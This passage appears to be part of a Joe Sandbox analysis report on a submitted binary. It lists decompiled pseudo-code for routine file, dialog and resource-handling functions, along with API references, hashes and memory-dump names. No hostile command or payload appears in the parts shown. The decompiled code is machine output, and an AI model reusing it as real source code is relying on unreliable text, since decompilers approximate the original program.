0x00b8b3e1
0x00b8b3e3
0x00b8b3e9
0x00b8b3f0
0x00b8b3f3
0x00b8b3f6
0x00b8b3f7
0x00b8b3fa
0x00b8b3fb
0x00b8b3fe
0x00b8b3ff
0x00b8b420
0x00b8b420
0x00b8b422
0x00000000
0x00000000
0x00b8b407
0x00b8b409
0x00b8b40b
0x00b8b40d
0x00b8b40f
0x00b8b411
0x00b8b413
0x00b8b41e
0x00000000
0x00b8b41e
0x00b8b413
0x00b8b40f
0x00000000
0x00b8b40b
0x00b8b424
0x00b8b426
0x00b8b429
0x00b8b442
0x00b8b442
0x00b8b444
0x00b8b447
0x00b8b457
0x00b8b459
0x00b8b459
0x00b8b449
0x00b8b449
0x00b8b44c
0x00000000
0x00b8b44e
0x00b8b44e
0x00b8b451
0x00000000
0x00b8b453
0x00b8b453
0x00b8b453
0x00b8b451
0x00b8b44c
0x00b8b467
0x00b8b46b
0x00b8b479
0x00b8b47e
0x00b8b493
0x00b8b495
0x00b8b49b
0x00b8b49e
0x00b8b4d0
0x00b8b4d0
0x00b8b4d5
0x00b8b4db
0x00b8b4db
0x00b8b4e2
0x00b8b4fc
0x00b8b4fc
0x00b8b4fd
0x00b8b503
0x00b8b509
0x00b8b50a
0x00b8b50b
0x00b8b510
0x00b8b513
0x00b8b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8b4e4
0x00b8b4e4
0x00b8b4ea
0x00b8b4ec
0x00000000
0x00b8b4ee
0x00b8b4ee
0x00b8b4f1
0x00000000
0x00b8b4f3
0x00b8b4f3
0x00b8b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8b4fa
0x00b8b4f1
0x00b8b4ec
0x00000000
0x00b8b517
0x00b8b51f
0x00b8b525
0x00b8b527
0x00b8b527
0x00b8b52f
0x00b8b534
0x00b8b53c
0x00b8b53f
0x00b8b541
0x00b8b555
0x00b8b55a
0x00b8b4a0
0x00b8b4a0
0x00b8b4a1
0x00b8b4a2
0x00b8b4a3
0x00b8b4a4
0x00b8b4ac
0x00b8b4ac
0x00b8b4ac
0x00b8b4ae
0x00b8b4b1
0x00b8b4b4
0x00b8b4b4
0x00b8b4ba
0x00b8b42b
0x00b8b42b
0x00b8b42e
0x00b8b430
0x00000000
0x00b8b432
0x00b8b432
0x00b8b435
0x00b8b436
0x00b8b437
0x00b8b438
0x00b8b43d
0x00b8b430
0x00b8b4bc
0x00b8b4bf
0x00b8b4c0
0x00b8b4c1
0x00b8b4c3
0x00b8b4cc
0x00000000
0x00000000
0x00000000
0x00b8b39a
0x00b8b36e
0x00b8b370
0x00b8b3cc
0x00b8b3d0
0x00b8b3d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8b305
0x00b8b308
0x00b8b30b
0x00b8b30e
0x00b8b311
0x00b8b314
0x00b8b317
0x00b8b317
0x00000000
0x00b8b2d4
0x00b8b2b6
0x00b8b2b6
0x00b8b322
0x00b8b324
0x00000000
0x00b8b329
0x00b8b1f8
0x00b8b1f8
0x00b8b1fb
0x00b8b204
0x00b8b207
0x00b8b20e
0x00b8b210
0x00b8b229
0x00b8b22a
0x00b8b22b
0x00b8b22d
0x00b8b232
0x00b8b212
0x00b8b212
0x00b8b215
0x00b8b216
0x00b8b218
0x00b8b21a
0x00b8b21c
0x00b8b221
0x00b8b221
0x00b8b235
0x00b8b237
0x00b8b239
0x00000000
0x00000000
0x00b8b23f
0x00b8b242
0x00b8b244
0x00b8b246
0x00000000
0x00b8b248
0x00b8b248
0x00b8b24b
0x00000000
0x00b8b24b
0x00000000
0x00b8b246
0x00b8b32a
0x00b8b32d
0x00b8b332
0x00000000
0x00b8b335
0x00b8b1c8
0x00b8b1c8
0x00b8b1cf
0x00b8b1d0
0x00b8b1d2
0x00b8b1d7
0x00b8b336
0x00b8b33a
0x00b8b33a
0x00000000

APIs

_free.LIBCMT ref: 00B8B324

Part of subcall function 00B89097: IsProcessorFeaturePresent.KERNEL32(00000017,00B89086,00000000,00B88D94,00000000,00000000,00000000,00000016,?,?,00B89093,00000000,00000000,00000000,00000000,00000000), ref: 00B89099
Part of subcall function 00B89097: GetCurrentProcess.KERNEL32(C0000417,00B88D94,00000000,?,00000003,00B89868), ref: 00B890BB
Part of subcall function 00B89097: TerminateProcess.KERNEL32(00000000,?,00000003,00B89868), ref: 00B890C2

Strings

*?, xrefs: 00B8B1FB
., xrefs: 00B8B4DB

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: cd633689a6e2f8f3109a2a710eb75b004c8b2873982dc6a920e56b4dd068e28b
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 99514F75E0021AEFDF14EFA8C881AADBBF5EF58314F2441A9E854E7361E7359A01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B675DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B675DE(void* __ecx) {
				void* __esi;
				char _t55;
				signed int _t58;
				void* _t62;
				signed int _t63;
				signed int _t69;
				signed int _t86;
				void* _t91;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				E00B7EB78(0xb927e9, _t108);
				E00B7EC50(0x60f8);
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00B70602(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t82 =  *((intOrPtr*)(_t108 + 8));
					E00B677DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00B705DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
							E00B66EDB(_t108 - 0x3094);
							_push(0);
							_t55 = E00B6A56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
							_t86 =  *(_t108 - 0x208c);
							 *((char*)(_t108 - 0xd)) = _t55;
							__eflags = _t86 & 0x00000001;
							if((_t86 & 0x00000001) != 0) {
								__eflags = _t86 & 0xfffffffe;
								E00B6A4ED(_t106, _t86 & 0xfffffffe);
							}
							E00B69556(_t108 - 0x204c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t58 = E00B69F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t58;
							if(_t58 != 0) {
								_push(0);
								_push(_t108 - 0x204c);
								_push(0);
								_t69 = E00B63BBA(_t82);
								__eflags = _t69;
								if(_t69 != 0) {
									E00B69620(_t108 - 0x204c);
								}
							}
							E00B69556(_t108 - 0x50cc);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t63 = E00B698E0(_t108 - 0x50cc, _t106, _t106, 5);
								__eflags = _t63;
								if(_t63 != 0) {
									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
								}
							}
							E00B6A4ED(_t106,  *(_t108 - 0x208c));
							E00B6959A(_t108 - 0x50cc);
							_t91 = _t108 - 0x204c;
						} else {
							E00B69556(_t108 - 0x6104);
							_push(1);
							_push(_t108 - 0x6104);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00B63BBA(_t82);
							_t91 = _t108 - 0x6104;
						}
						_t62 = E00B6959A(_t91);
					} else {
						E00B62021(_t113, 0x53, _t82 + 0x32, _t106);
						_t62 = E00B66D83(0xba1098, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t62;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00B70602(_t108 - 0x1014, 0xb937a0, 0x802);
					E00B705DA(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x00b675e3
0x00b675ed
0x00b675f4
0x00b675fd
0x00b6762c
0x00b6762c
0x00b6763a
0x00b6763f
0x00b6763f
0x00b6764f
0x00b67654
0x00b6765c
0x00b6767b
0x00b6767f
0x00b676bc
0x00b676c7
0x00b676d4
0x00b676d7
0x00b676dc
0x00b676e2
0x00b676e5
0x00b676e8
0x00b676ea
0x00b676ef
0x00b676ef
0x00b676fa
0x00b67707
0x00b67715
0x00b6771a
0x00b6771c
0x00b6771e
0x00b67727
0x00b67728
0x00b67729
0x00b6772e
0x00b67730
0x00b67738
0x00b67738
0x00b67730
0x00b67743
0x00b67748
0x00b6774c
0x00b67750
0x00b6775b
0x00b67760
0x00b67762
0x00b6777f
0x00b6777f
0x00b67762
0x00b6778c
0x00b67797
0x00b6779c
0x00b67681
0x00b67687
0x00b6768c
0x00b67696
0x00b67697
0x00b6769a
0x00b6769d
0x00b676a2
0x00b676a2
0x00b677a2
0x00b6765e
0x00b67665
0x00b67671
0x00b67671
0x00b677ad
0x00b677b5
0x00b677b5
0x00b675ff
0x00b67603
0x00000000
0x00b67605
0x00b67605
0x00b67617
0x00b67625
0x00000000
0x00b67625

APIs

__EH_prolog.LIBCMT ref: 00B675E3

Part of subcall function 00B705DA: _wcslen.LIBCMT ref: 00B705E0

Part of subcall function 00B6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6777F

Part of subcall function 00B6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A501
Part of subcall function 00B6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A532

Strings

:, xrefs: 00B67654

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 01fdaaf925e1cda53c035a3fe3e07ccb1abb6ce5add365907e678fa2ffb7a97d
Instruction ID: eaa8b476099b452d7785df86ce5f64eded4b7f1ac80b867270b3251def2e83b0
Opcode Fuzzy Hash: 01fdaaf925e1cda53c035a3fe3e07ccb1abb6ce5add365907e678fa2ffb7a97d
Instruction Fuzzy Hash: 13415271801258AAEB25EB64CD95EEEB3FCEF55304F0040D6B60AA2192DF785F84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00B7B48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
				void* __edi;
				void* __ebp;
				intOrPtr _t20;
				short* _t31;
				intOrPtr* _t33;
				signed int _t41;
				intOrPtr* _t42;
				void* _t44;

				E00B7EC50(0x2004);
				_push(0x80000);
				_t42 = E00B83E33(__ecx);
				if(_t42 == 0) {
					E00B66CA7(0xba1098);
				}
				_t33 = _a8200;
				 *_t42 = 0;
				_t41 = 0;
				while(1) {
					_push(0x1000);
					_push( &_a3);
					_push(0);
					_push(0);
					_push( &_a4);
					_push( *_t33);
					_t20 = E00B7B314(_t41, 0);
					 *_t33 = _t20;
					if(_t20 == 0) {
						break;
					}
					if( *_t42 != 0 || _a8 != 0x7b) {
						if(_a8 == 0x7d || E00B83E13( &_a8) + _t41 > 0x3fffb) {
							break;
						} else {
							E00B87686(_t42,  &_a8);
							_t41 = E00B83E13(_t42);
							_t44 = _t44 + 0xc;
							if(_t41 == 0) {
								L11:
								if(_a7 == 0) {
									E00B86066(_t42 + _t41 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t41 - 1; // -1
							_t31 = _t42 + _t6 * 2;
							while( *_t31 == 0x20) {
								_t31 = _t31 - 2;
								_t41 = _t41 - 1;
								if(_t41 != 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}

0x00b7b493
0x00b7b49c
0x00b7b4a6
0x00b7b4ab
0x00b7b4b2
0x00b7b4b2
0x00b7b4b7
0x00b7b4c2
0x00b7b4c5
0x00b7b537
0x00b7b537
0x00b7b540
0x00b7b541
0x00b7b542
0x00b7b547
0x00b7b548
0x00b7b54a
0x00b7b54f
0x00b7b553
0x00000000
0x00000000
0x00b7b4cc
0x00b7b4dc
0x00000000
0x00b7b4f2
0x00b7b4f8
0x00b7b503
0x00b7b505
0x00b7b50a
0x00b7b520
0x00b7b525
0x00b7b530
0x00b7b536
0x00000000
0x00b7b525
0x00b7b50c
0x00b7b50f
0x00b7b512
0x00b7b518
0x00b7b51b
0x00b7b51e
0x00000000
0x00000000
0x00000000
0x00b7b51e
0x00000000
0x00b7b512
0x00000000
0x00000000
0x00000000
0x00b7b4cc
0x00b7b565

APIs

_wcslen.LIBCMT ref: 00B7B4E3
_wcslen.LIBCMT ref: 00B7B4FE

Strings

}, xrefs: 00B7B4D6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 2b005f8dd9ec5e63ae68d7adb2f5090bc016daac5b3f914598e22de0b88feb5b
Instruction ID: 9c1c0d82d0f6c1924f707f1b2187185dceb31f4e5db5d4892cbc81fd071a222f
Opcode Fuzzy Hash: 2b005f8dd9ec5e63ae68d7adb2f5090bc016daac5b3f914598e22de0b88feb5b
Instruction Fuzzy Hash: 7E21237290430A5ADB31EA64D841F6FB3ECDFA1B14F1044AAF558C3241EB74DE488BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B6F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B6F2E4
Part of subcall function 00B6F2C5: GetProcAddress.KERNEL32(00BA81C8,CryptUnprotectMemory), ref: 00B6F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00B6F33E), ref: 00B6F3D2

Strings

CryptUnprotectMemory failed, xrefs: 00B6F3CA
CryptProtectMemory failed, xrefs: 00B6F389

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 9309bc7bef8c889573e2099fec1d6b3e0867e3b99d11a188c4d22cb69c2a9268
Instruction ID: 83c201e97ad42562688147076ab7bd9e2fdb06444d039958c87a71b5efb5ad5a
Opcode Fuzzy Hash: 9309bc7bef8c889573e2099fec1d6b3e0867e3b99d11a188c4d22cb69c2a9268
Instruction Fuzzy Hash: 75110331A0562AABDF119F24ED42A7E37D5FF05B20B0081A6FC056B361DE389D018B98

Uniqueness

Uniqueness Score: -1.00%

Function 00B6B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B6B991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				short _t13;
				signed int _t14;
				short* _t19;
				signed int _t20;
				void* _t22;
				signed short* _t26;
				signed int _t28;
				signed int _t30;

				_t19 = _a8;
				_t26 = _a4;
				 *_t19 = 0;
				_t10 = E00B6BC98(__eflags, _t26);
				_t20 =  *_t26 & 0x0000ffff;
				if(_t10 != 0) {
					return E00B64092(_t19, _a12, L"%c:\\", _t20);
				}
				_t28 = 0x5c;
				__eflags = _t20 - _t28;
				if(_t20 == _t28) {
					__eflags = _t26[1] - _t28;
					if(_t26[1] == _t28) {
						_push(_t28);
						_push( &(_t26[2]));
						_t10 = E00B822C6(_t20);
						_pop(_t22);
						__eflags = _t10;
						if(_t10 != 0) {
							_push(_t28);
							_push(_t10 + 2);
							_t13 = E00B822C6(_t22);
							__eflags = _t13;
							if(_t13 == 0) {
								_t14 = E00B83E13(_t26);
							} else {
								_t14 = (_t13 - _t26 >> 1) + 1;
							}
							__eflags = _t14 - _a12;
							asm("sbb esi, esi");
							_t30 = _t28 & _t14;
							E00B860C2(_t19, _t26, _t30);
							_t10 = 0;
							__eflags = 0;
							 *((short*)(_t19 + _t30 * 2)) = 0;
						}
					}
				}
				return _t10;
			}

0x00b6b992
0x00b6b999
0x00b6b99e
0x00b6b9a1
0x00b6b9a6
0x00b6b9ab
0x00000000
0x00b6b9bd
0x00b6b9c5
0x00b6b9c6
0x00b6b9c9
0x00b6b9cb
0x00b6b9cf
0x00b6b9d4
0x00b6b9d5
0x00b6b9d6
0x00b6b9dc
0x00b6b9dd
0x00b6b9df
0x00b6b9e4
0x00b6b9e5
0x00b6b9e6
0x00b6b9ed
0x00b6b9ef
0x00b6b9f9
0x00b6b9f1
0x00b6b9f5
0x00b6b9f5
0x00b6b9ff
0x00b6ba03
0x00b6ba05
0x00b6ba0a
0x00b6ba12
0x00b6ba12
0x00b6ba14
0x00b6ba14
0x00b6b9df
0x00b6b9cf
0x00000000

APIs

_swprintf.LIBCMT ref: 00B6B9B8

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

Strings

%c:\, xrefs: 00B6B9AE

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: b9b0f9ba4757ccd1bafe594320d8df873bd537343abe270ecf1ef75b1cb63f59
Instruction ID: b5c2ac0190152e1580990a6221b29524f6b39bd395e0cff020af6b2c044a0953
Opcode Fuzzy Hash: b9b0f9ba4757ccd1bafe594320d8df873bd537343abe270ecf1ef75b1cb63f59
Instruction Fuzzy Hash: CC01F16350031269DA30BBB58C86D6BA7FCEE91770B40489AF544D6192EF28D880C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00B61316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B61316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00B6E2C1(0xba1030, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00B6E2E8(0xba1030, __edx, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xbc3154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xb935f4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00b6131d
0x00b61380
0x00b6131f
0x00b6131f
0x00b61326
0x00b6133c
0x00b61345
0x00b6134a
0x00b61352
0x00b6135a
0x00b61362
0x00b61370
0x00b61370
0x00b61362
0x00b61352
0x00b61345
0x00b61326
0x00b61388

APIs

Part of subcall function 00B6E2E8: _swprintf.LIBCMT ref: 00B6E30E
Part of subcall function 00B6E2E8: _strlen.LIBCMT ref: 00B6E32F
Part of subcall function 00B6E2E8: SetDlgItemTextW.USER32(?,00B9E274,?), ref: 00B6E38F
Part of subcall function 00B6E2E8: GetWindowRect.USER32(?,?), ref: 00B6E3C9
Part of subcall function 00B6E2E8: GetClientRect.USER32(?,?), ref: 00B6E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

Strings

0, xrefs: 00B61319

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 0ca81b2c211963bbcb0ee53e00aaad6e6349ecafada630f37704bbf280693e45
Instruction ID: 3529f394f08211aa8317bce7bc00a7ef679bbaced56034d9d6dae1dd6cd9885b
Opcode Fuzzy Hash: 0ca81b2c211963bbcb0ee53e00aaad6e6349ecafada630f37704bbf280693e45
Instruction Fuzzy Hash: 6DF0AF30104288BADF550F688C0DBEA3BE9EF04744F0C8994FC47616A1CB7CC990EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00B70FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00B70FE4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00B66C31(E00B66C36(_t6, 0xba1098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xba1098, 0xba1098, 2);
				}
				return _t2;
			}

0x00b70fe4
0x00b70fea
0x00b70ff3
0x00b70ffc
0x00000000
0x00b7101b
0x00b7101c

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00B71101,?,?,00B7117F,?,?,?,?,?,00B71169), ref: 00B70FEA
GetLastError.KERNEL32(?,?,00B7117F,?,?,?,?,?,00B71169), ref: 00B70FF6

Part of subcall function 00B66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B66C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B70FFF

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3e7a20e923aa5102764c7f47c29bbed3c918b927268cc204f781cb4bfb43fe10
Instruction ID: ed3e0c68501dcb622035f6e7304f0b8c3103d0002d0b7ff469a8d88f4fb22e1c
Opcode Fuzzy Hash: 3e7a20e923aa5102764c7f47c29bbed3c918b927268cc204f781cb4bfb43fe10
Instruction Fuzzy Hash: 0AD05B7250C93076C620373C6D06D6F3D84DB12731F504B95F139651F5CF154D915695

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6E29E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x00b6e2a1
0x00b6e2b1
0x00b6e2b9
0x00b6e2bb
0x00000000
0x00b6e2bb
0x00b6e2c0

APIs

GetModuleHandleW.KERNEL32(00000000,?,00B6DA55,?), ref: 00B6E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B6DA55,?), ref: 00B6E2B1

Strings

RTL, xrefs: 00B6E2AB

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
